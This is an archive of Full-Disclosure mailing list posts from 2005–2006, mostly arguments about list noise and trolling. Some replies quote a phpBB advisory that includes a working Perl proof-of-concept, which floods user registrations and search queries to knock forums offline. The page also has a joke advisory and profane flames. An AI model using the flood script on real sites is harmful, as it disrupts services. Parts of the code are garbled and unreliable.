might get mentioned on his press conferences or radio addresses as being part of 
the "axis of evil".
On 3/30/06, Anders B Jansson [EMAIL PROTECTED] wrote:

 Stan Bubrouski wrote:
   Name one powerful hacker kicked out of here?
   Just one.
   And you don't count (neither do I but I've never claimed to be an expert or
   important).

 Kicked from a public un-moderated mailing list? How?

 Now, if you don't like the noise, why don't you just shut the fuck up instead
 of answering the trolls?

 The noise isn't the idiot mailings, the noise is people who should know better
 answering the morons. _don't answer morons_ it serves no purpose.

 If someone posts something that is misguided or bad, then sure correct me (or
 us). But if someone posts something moronic, then please ignore. You're only
 helping the moron.

 I again refer to the best proverb I've heard (and he's a windows guru, shudder):
 "Don't argue with an idiot, he'll just drag the discussion to his level and
 beat you with experience."

 So, if someone posts something silly or moronic, giggle, groan and delete. Do
 _not_ respond to prove that he (or remotely possibly she) is a moron. If we
 haven't got that already we have ourselves to blame.

 Oh, and of course, this is for 'us', boring grayhats who want to read a clean
 list of the latest exploits every morning. Non-grayhats who want to annoy us
 are of course free to do so, after all, it is un-moderated and it's
 full-disclosure.

 So configure your frikken filters and stop responding to idiots.

 // hdw

[Full-disclosure] A Move to Remove

2006-03-31 Thread Edward Pearson

Guys,
Please don't turn
this into spam/flame/troll. This is a quick note to say, would all
those who'd like n3td3v (the world's greatest hacker and legend in his own
mind) to unsubscribe from this list, and not post again, please make it
known.

Thanks

Ed

FW: [Full-disclosure] Secure HTTP

2006-03-23 Thread Edward Pearson
I did a similar thing and used it to get around my school's filtering
system. I'd wager he's trying to do something like this ;)

Unfortunately, what Julian says is correct, you'll need to bounce the
connection through another server with stunnel forwarding the (now
encrypted) connections back to your gateway. Which isn't too bad, all
you need is a halfway decent shell account (or just get a damn server)
that'll allow background procs.

Just my 2 pence.

Ed

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Brian
Eaton
Sent: 23 March 2006 15:40
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Secure HTTP

On 3/23/06, Julien GROSJEAN - Proxiad [EMAIL PROTECTED] wrote:
 Ok, but all his traffic on his network will be encrypted... no ?
 
  If the sites you are visiting don't support encryption, you are 
  still going to end up with data in clear-text on the wire.
 

Sure.  It depends on who and what he is worried about.

- Brian



FW: [Full-disclosure] Noise on the list

2006-03-21 Thread Edward Pearson
My friend,
I posted an e-mail about this kind of thing a few months back. I was
saddened to see no effect. I have something like 600 unread e-mails in my
FD box, I'd say around 200 of them MAY be worth reading.

I used to love this list, I subscribe to Bugtraq now. Nuff said.

Ed

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Frederic
Pasteleurs
Sent: 21 March 2006 16:48
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Noise on the list

Hello everybody,

I subscribed to this mailing list in 2004 just to keep me informed about
some useful tips and the latest issues/problems in the software packages
I'm using for my everyday computing habits.

I had a hard time keeping up with the flow of mails in the beginning,
but it was still manageable.
The n3td3v trolling case several months ago was annoying, but still
okay.
Then came the fake advisories spamming, I was a bit pissed by the
amount of mails to delete, but didn't care much more than that.
Then the animal porn drawings spamming: this time, I was seriously
considering leaving the list and I felt sorry for the huge waste of
valuable bandwidth and disk space.

Now, I'm afraid to read any mail with the [Full-disclosure] header,
because nowadays you have to dig through childish and
mine-is-bigger-than-yours messages to actually find some interesting and
valuable information.

I know that's the price to pay for an unmoderated list, but the noise
level reached a level I could not tolerate and I will leave this list by
the end of the week.

It seems that unmoderated lists work only for mature people and those
that keep silent when they have nothing to say...

Come on people, how old are you ??



FW: [Full-disclosure] Noise on the list

2006-03-21 Thread Edward Pearson
I shouldn't have to get the fucking spamfilter involved when we're
talking about a mailing list. Seriously, it takes the piss. What you
said about idiots responding to idiots is a very good point however.

Ed

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Anders B
Jansson
Sent: 21 March 2006 17:13
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Noise on the list

Frederic Pasteleurs wrote:
 Hello everybody,
 
 I subscribed to this mailing list in 2004 just to keep me informed 
 about some useful tips and the latest issues/problems in the software 
 packages I'm using for my everyday computing habits.
 
 I had a hard time to keep up with the flow of mails in the beginning, 
 but it was still manageable.
 The n3td3v trolling case several months ago was annoying, but still
okay.
 Then came the fake advisories spamming, i was a bit pissed by the
snip
 Come on people, how old are you ??
43 1/2

And the spamming isn't that bad, 3-4 filter rules are needed but that's
about it.

The problem, if any, isn't the trolling but the moronic replies from
people who should know better than responding to morons.

Hello? If someone writes something stupid/silly/moronic then
killfile/filter and/or ignore.
Don't respond to it, you'll only make it worse.

Or to quote ye olde proverb:
Never argue with idiots, they'll just drag the discussion down to their
own level and beat you with experience.
 
--
// hdw



[Full-disclosure] !ADVISORY! + +Thu Mar 16 14:28:51 EST 2006+ + Off-by-one in AOL Client Software

2006-03-16 Thread Edward Pearson



!ADVISORY! + +Thu Mar 16 14:28:51 EST 2006+ + Off-by-one in AOL Client Software




==
8===D DESCRIPTION
==
It is possible to make AOL Client Software crash by the use of malformed input.

==
8===D HISTORY
==
2/25/2006 8==D Vendor Notification.
1/11/2006 8==D Vendor Reply.
3/16/2006 8==D Public Disclosure.
==
APPENDIX A VENDOR INFORMATION
==
http://www.aol.com

==
APPENDIX B REFERENCES
==
RFC 4090

==
CONTACT
==
Edward Pearson [EMAIL PROTECTED]
1-888-565-9428

CISSP CCE CEH CSFA SSP-MPA GWAS CAP SSCP 



RE: [Full-disclosure] my first question

2006-03-15 Thread Edward Pearson



He's talking about BNC (like psyBNC) for IRC networks.
"is it possible to connect all server" - Not looking to
start a botnet are we?

Normally the list is reserved for more specific questions,
or advisories. Perhaps you could be a little clearer about what
version of BNC you're interested in, and what platform it's running
on.

Ed


From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of [CTN]-BongSnoTbOmBs[CTN]
Sent: 14 March 2006 23:14
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] my first question

hi, i'm italian..my eng is not very good..:D
i'm searching for a BNC exploit..
is it possible to connect all server? it's a question..
tnx

RE: [Full-disclosure] strange domain name in phishing email

2006-03-14 Thread Edward Pearson
IE5 was the last version of IE to support that kind of octal URL. In IE6 it has
been deprecated.

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Julien GROSJEAN 
- Proxiad
Sent: 14 March 2006 08:45
To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] strange domain name in phishing email

I think you try to remove the slash at the end...
What about the logs ?



Alice Bryson wrote:
  BTW, this kind of IP address would not always work. I tried to use
  http://2887060730/ to access an internal web server http://172.21.12.250,
  but failed.
  It said 400 bad request.
  I use Windows XP IE 6, web server is Apache on Windows 2003, does anyone
  know why?



RE: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability

2006-01-26 Thread Edward Pearson



No, I do believe full-disclosure to be the best
method. In the case of DoS attacks, I think a point should be made of
making sure the vendor is informed, and a patch available before disclosed, then
I believe it's down to the author's discretion when he releases the exploit, even
if it's a PoC.


From: poo [mailto:[EMAIL PROTECTED]
Sent: 26 January 2006 11:31
To: Edward Pearson
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability

so what you're saying is that DoS exploits shouldn't be disclosed?
On 1/25/06, Edward Pearson [EMAIL PROTECTED] wrote:

  The less said about DoS attacks the better. A tactic mostly employed by
  asexual teenagers who live in their parents' basement and call themselves
  "h4x0rz".
  
  
  
  
  From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of h4cky0u
  Sent: 25 January 2006 14:44
  To: full-disclosure@lists.grok.org.uk
  Cc: bugtraq@securityfocus.com
  Subject: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability
  
--
HYSA-2006-001 h4cky0u.org Advisory 010
--
Date - Wed Jan 25 2006

TITLE:
==
phpBB 2.0.19 search.php and profile.php DOS Vulnerability

SEVERITY:
=
High

SOFTWARE:
=
phpBB 2.0.19 and prior

INFO:
=
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.
Support Website : http://www.phpbb.com

BUG DESCRIPTION:
The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at - http://h4cky0u.org/viewtopic.php?t=637
This one affected only versions up till phpBB 2.0.15. The exploit code has been recoded which affects the latest version too. The bug resides in the following two scripts-
profile.php  By registering as many users as you can.
search.php   By searching in a way that the db cannot understand.Proof Of Concept Code:==#!/usr/bin/perl ### ##   Recoded by: mix2mix and Elioni of 
http://ahg-khf.org##   And h4cky0u Security Forums (
http://h4cky0u.org) ##   Name: phpBBDoSReloaded##   Original Author: HaCkZaTaN of Neo Security Team 
##   Tested on phpBB 2.0.19 and earlier versions##   Ported to perl by g30rg3_x##   Date: 25/01/06### use IO::Socket; ## Initialized X $x = 0; print q(
  phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN  Recoded by Albanian Hackers Group   h4cky0u Security Forums	); print q(Host |without- http://www.| ); 
$host = STDIN; chop ($host); print q(Path |example- /phpBB2/ or /| ); $pth = STDIN; chop ($pth); print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| ); 
$type = STDIN; chop ($type); ## Tipi për regjistrim if($type == 1){ ## User Loop for  loops (enough for Flood x) while($x != ) { ## Antari që regjistrohet automatikishtë "X" 
$uname = "username=AHG__" . "$x"; ## Emaili që regjistrohet ne bazën "X" $umail = "email=AHG__" . "$x"; $postit = "$uname"."$umail"."%40ahg-
crew.orgnew_password=0123456password_confirm=0123456icq=aim=N%2FAmsn=yim=website=location=occupation=interests=signature=viewemail=0hideonline=0notifyreply=0notifypm=1popup_pm=1attachsig=1allowbbcode=1allowhtml=0allowsmilies=1language=englishstyle=2timezone=0dateformat=D+M+d%2C+Y+g%3Ai+amode=registeragreed=truecoppa=0submit=Submit

"; $lrg = length $postit; my $sock = new IO::Socket::INET (  PeerAddr = "$host",  PeerPort = "80", 

 Proto = "tcp", ); die "\nNuk mundem te lidhemi me hostin sepse ësht dosirat ose nuk egziston: $!\n" unless $sock; ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums 
print $sock "POST $pth"."profile.php HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; 
print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; 
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:

RE: [Full-disclosure] can a brother get some disclosure?

2006-01-25 Thread Edward Pearson



Ok, you're speaking English, but the message just isn't
getting across. Think grammar. Clearly you're
trying to boot Windows Vista/XP on the Intel Mac and claim $3000+ for
yourself.

Well my good sir, don't be so lazy, we're not going to work
to win you a competition. Especially when (I assume) it'll have taken most
people a while to decipher what the hell you are talking
about.

As far as the EFI goes, we're in a catch 22 with the
Windows boot.

EFI won't boot MBR (El Torito, UDF) records, nor will it
even recognise them. You can get Windows install as far as "Press any key
to boot from the CD" by copying the kernel + data to a HD/USB. But after that
it'll die because it can't see the install CD.

The options? Edit the Vista/XP kernel to boot +
install from a HD partition (Good luck), or mod the EFI so it can
recognise UDF or El Torito (Good luck). So basically, you
don't have a fucking chance.

Bye now!

Ed



From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of PCSC Information Services
Sent: 25 January 2006 02:47
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] can a brother get some disclosure?
Hi all,
I'm sure you're aware that there is a new Intel iMac out there. Can we get 
some info on the system boot sequence to be certain that the EFI module is in no 
way 'blessed' by the TPM module prior to initialization? I have only one box to 
give, and while I'm interested in having this issue fully disclosed, I am unable 
to utilize this machine for this purpose, in that I'm offering it up as a 
sacrificial Universal Binary lamb. I feel the community is best served by having 
solid, well-coded software running in OS X. Rather than attempting to do both,
and serve neither purpose, I'm putting it to full-disclosurati to out the boot 
process in all steps, keep in mind there's a bounty for this fun and frivolity 
with a 17" piece of plastic! It's growing all the time!

Thanks in advance,

Sean Swayze

When you have eliminated all 
which is impossible, then whatever remains, however improbable, must be the 
truth.
-Sherlock Holmes


RE: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability

2006-01-25 Thread Edward Pearson



The less said about DoS attacks the better. A
tactic mostly employed by asexual teenagers who live in their parents'
basement and call themselves "h4x0rz".




From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of h4cky0u
Sent: 25 January 2006 14:44
To: full-disclosure@lists.grok.org.uk
Cc: bugtraq@securityfocus.com
Subject: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability
--
HYSA-2006-001 h4cky0u.org Advisory 010
--
Date - Wed Jan 25 2006

TITLE:
==
phpBB 2.0.19 search.php and profile.php DOS Vulnerability

SEVERITY:
=
High

SOFTWARE:
=
phpBB 2.0.19 and prior

INFO:
=
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.
Support Website : http://www.phpbb.com

BUG DESCRIPTION:
The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at - http://h4cky0u.org/viewtopic.php?t=637
This one affected only versions up till phpBB 2.0.15. The exploit code has been recoded which affects the latest version too. The bug resides in the following two scripts-
profile.php  By registering as many users as you can.
search.php   By searching in a way that the db cannot understand.Proof Of Concept Code:==#!/usr/bin/perl ### ##   Recoded by: mix2mix and Elioni of 
http://ahg-khf.org##   And h4cky0u Security Forums (http://h4cky0u.org) ##   Name: phpBBDoSReloaded##   Original Author: HaCkZaTaN of Neo Security Team 
##   Tested on phpBB 2.0.19 and earlier versions##   Ported to perl by g30rg3_x##   Date: 25/01/06### use IO::Socket; ## Initialized X $x = 0; print q(
  phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN  Recoded by Albanian Hackers Group   h4cky0u Security Forums	); print q(Host |without- http://www.| ); 
$host = STDIN; chop ($host); print q(Path |example- /phpBB2/ or /| ); $pth = STDIN; chop ($pth); print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| ); 
$type = STDIN; chop ($type); ## Tipi për regjistrim if($type == 1){ ## User Loop for  loops (enough for Flood x) while($x != ) { ## Antari që regjistrohet automatikishtë "X" 
$uname = "username=AHG__" . "$x"; ## Emaili që regjistrohet ne bazën "X" $umail = "email=AHG__" . "$x"; $postit = "$uname"."$umail"."%40ahg-
crew.orgnew_password=0123456password_confirm=0123456icq=aim=N%2FAmsn=yim=website=location=occupation=interests=signature=viewemail=0hideonline=0notifyreply=0notifypm=1popup_pm=1attachsig=1allowbbcode=1allowhtml=0allowsmilies=1language=englishstyle=2timezone=0dateformat=D+M+d%2C+Y+g%3Ai+amode=registeragreed=truecoppa=0submit=Submit
"; $lrg = length $postit; my $sock = new IO::Socket::INET (  PeerAddr = "$host",  PeerPort = "80", 
 Proto = "tcp", ); die "\nNuk mundem te lidhemi me hostin sepse ësht dosirat ose nuk egziston: $!\n" unless $sock; ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums 
print $sock "POST $pth"."profile.php HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; 
print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; 
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; 
print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); ## Print a "+" for every loop syswrite STDOUT, "+"; $x++; } 
## Tipi 2-shë për Kërkim(Flood) } elsif ($type == 2){ while($x != ) { ## Final Search String to Send $postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+search_terms=anysearch_author=search_forum=-1search_time=0search_fields=msgonlysearch_cat=-1sort_by=0sort_dir=ASCshow_results=postsreturn_chars=200"; 
## Posit Length $lrg = length $postit; ## Connect Socket with Variables Provided By User my $sock = new IO::Socket::INET (  PeerAddr = "$host", 
 PeerPort = "80",  Proto = "tcp", ); die "\nThe 

RE: [Full-disclosure] Improper Character Handling In PHP Based Scriptslike PhpBB, IPB etc.

2006-01-24 Thread Edward Pearson



Nice,
When I was playing around with this on a test
server, when pasting it into a certain form bit, Firefox's stack overflowed.
Will look into it and let you guys know.

Ed


From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of h4cky0u
Sent: 24 January 2006 10:43
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Improper Character Handling In PHP Based Scriptslike PhpBB, IPB etc.

Well this was after I found somebody posing as me on my site -- http://www.h4cky0u.org which was actually
quite interesting and dangerous (looking from the social engineering point
of view).

Download the following file -

http://www.h4cky0u.org/poc.txt

Make sure you download it and not view it from the browser. Once you
download that file open it in your text editor. You should see something
like-

--desiredusername
Copy that whole string and try and post it on any PHP based blog, forum etc
or register a username with that string. Now what do you see? The -- part from
--desiredusername is gone! But apparently it's still there. It still hides within
that string (Try and reverse the process you just did). Ok so the bug has been
confirmed. Now come the questions -

1) Is this really a bug in PHP (tested with PHP 4.3.11 and later
versions might as well be affected)? Or am I overlooking something?

2) What is the ASCII code of that -- part in the file if it isn't just 2
simple hyphens? (Tried all the possible methods but couldn't come up with
anything positive.)

3) What are the possible ways to avoid something like this?
--
http://www.h4cky0u.org
(In)Security at its best...

RE: [Full-disclosure] PoC for the 2 new WMF vulnerabilities (DoS)

2006-01-10 Thread Edward Pearson

As far as I can tell this isn't
exploitable, can I get a second on that?

From:
[EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Drew Masters
Sent: 10 January 2006 12:20
To: Andrey Bayora
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] PoC
for the 2 new WMF vulnerabilities (DoS)

Not sure if it's been previously mentioned...

It's possible to cause similar crashes by making a malformed call to startdoc
instead of setabortproc with 64 bytes of garbage data.

Cheers

Drew



On 09/01/06, Andrey
Bayora [EMAIL PROTECTED]
wrote:

Hello list,

In case someone is interested:

Here is the PoC for the 2 new WMF vulnerabilities discovered by cocoruder
(http://ruder.cdut.net) and not
covered by MS06-001.

You can download WMF images at:
http://www.securityelf.org/files/WMF-DoS.rar

Regards,
Andrey.




RE: [Full-disclosure] XSS vulnerabilities in Google.com

2005-12-21 Thread Edward Pearson
Why has this become a trolling?
"if noone tells him what a stupid fag he is"
Are we back at fucking middle school? Have we descended to the level of
10 year olds??

Ground Zero, I've seen your company website(s) and your products. All I
say is I think you have several very good reasons to pay FUCKING close
attention to what is said on this list. Work it out.

The only people who seem hell bent on ruining this list for everyone
are:
InfoSecBOFH
n3td3v
Ground Zero Security

None of these people have anything to bring to the table.
Let's see at least one real vuln report/exploit from one of you, and then
the other two have to concentrate on growing up enough to not troll it
or make stupid pre-school comments.

Come on guys!!! I'm beginning to think that actually you're not bigger
than this...

Ultimately, if you've got problems with each other, do it on MSN, AIM,
IRC, USENET whatever, just not my inbox.

Have a fucking excellent day.

- Ed (BTW, Ground Zero has had my alias since 1995, now I see that this
chump is going round putting a black mark by it)

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
Sent: 21 December 2005 17:17
To: GroundZero Security; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com

You trolled this thread by saying Watchfire should stop disclosing
vulnerabilities for Yahoo and Google. You get the response you deserved
to get. Now you're running off the thread now with your tail between
your legs, because everyone has told you that Google and Yahoo
vulnerabilities (especially XSS) will never be banned from FD.


On 12/21/05, GroundZero Security [EMAIL PROTECTED] wrote:
 yes you are right, but it's like if noone tells him what a stupid fag 
 he is, he will keep posting and posting his irrelevant crap and just 
 ignore the tons of private mail he receives. I'm sorry for adding to
 the noise, but it's just too tempting.
 I try to ignore it. but I can't promise I will, the last mail he sent 
 just asks for a reply :P but ok...must...resist.
 btw my name is not groundzero, that's my company :)

 greetz
 -sk


[Full-disclosure] Please read. I feel this is important.

2005-12-19 Thread Edward Pearson
People,
Please read all of this and take note. It'll take two minutes of your
time.

When I opened my e-mail this morning, and jumped to the FD folder, what
I saw was the straw that broke the camel's back.

Of the 300(ish) e-mails I got today, almost all were titled "A small
editorial about recent events", which is basically some of the people on
this list arguing about American politics (from what I can glean from
the e-mail I did read).

Of the few remaining e-mails there was one, and only 1, security related
topic.

This is not why this list was created. To have one e-mail on topic and
the rest I can only class as spam. On such a respected list, that I have
been a keen subscriber to for years.

THIS IS A LIST FOR SECURITY, NOT FOR THE AMERICAN PUBLIC TO DISCUSS
WHAT'S WRONG WITH THEIR COUNTRY; WE'RE BORED OF HEARING ABOUT YOU IN THE
REAL NEWS, TRY AND KEEP IT OUT OF FULL-DISCLOSURE.

This is not what the list was designed for and believe me the people
making these stupid topics are the ones with the least to bring to the
table. Those people who have something to offer will be driven away
(this is happening already) and soon, the list will die.

I've seen calls for moderation, and people discussing ways of pruning
out the problem posts. All these topics turned into a complete farce,
becoming what they hoped to stop.

We must strive to keep this list alive and make it as important and
respected as it once was (Those who have been around a while will
remember the internet-wide ripple that could be caused by that one mail to
the list.)

The list literally has toppled major corporations and changed the views
and opinions of many of the most important people on the internet.

Even before computing became a big part of my life, before I'd ever used
a M$ product I had heard of FD.

So people please, even if what you post is good information, stop for a
few seconds and think. Is this security related? When somebody sees this
on Full-Disclosure, will there be any doubt of its relevance?

To save myself becoming a complete hypocrite, I'd like to ask that
nobody reply to this, just make sure you read and take note. Even if you
disagree.

Edward Pearson - IT Engineer
t:  08708518188
f:  08707947943
m: 07729155751
w: www.unitymail.co.uk  
9 Fishers Estate | Wiggenhall Road | Watford | Hertfordshire | WD18 0FN 



RE: [Full-disclosure] Please read. I feel this is important.

2005-12-19 Thread Edward Pearson
I hate to do exactly what I asked you guys not to...

However for me this sums it all up. This is an e-mail I received this
morning from somebody (no names mentioned) on the list:

[direct quote]
Sorry man I just wanted some traffic besides netdev,

so long as he doesn't post, I will keep mailings restricted to security
related hoop-a-ma-joop,

but I have a plan to douse netdev infosec bofh and the like by using the
only thing that is guaranteed to generate more responses than
trolling: american political rhetoric

sorry for the inconvenience
[/direct quote]

The guy who sent this has missed the point entirely...

I'll shut up about this now, but please understand, this isn't the
solution, this is the problem.

Best Wishes.

Edward Pearson - IT Engineer
t:  08708518188
f:  08707947943
m: 07729155751
w: www.unitymail.co.uk  
9 Fishers Estate | Wiggenhall Road | Watford | Hertfordshire | WD18 0FN 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Edward
Pearson
Sent: 19 December 2005 12:24
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Please read. I feel this is important.

